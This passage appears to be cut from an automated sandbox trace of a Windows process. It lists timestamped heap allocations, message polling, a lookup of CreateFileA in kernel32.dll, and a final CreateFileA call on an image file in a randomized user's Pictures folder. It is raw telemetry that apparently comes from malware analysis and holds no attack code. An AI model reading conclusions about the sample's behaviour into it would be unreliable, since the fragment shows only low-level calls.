hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.819] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.819] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.819] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.819] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.820] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.822] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88caf0 [0039.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88caf0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.825] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0039.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88caf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.826] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0039.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0039.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", cchWideChar=100, lpMultiByteStr=0x7c10a8, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpUsedDefaultChar=0x0) returned 100 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.827] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp" (normalized: 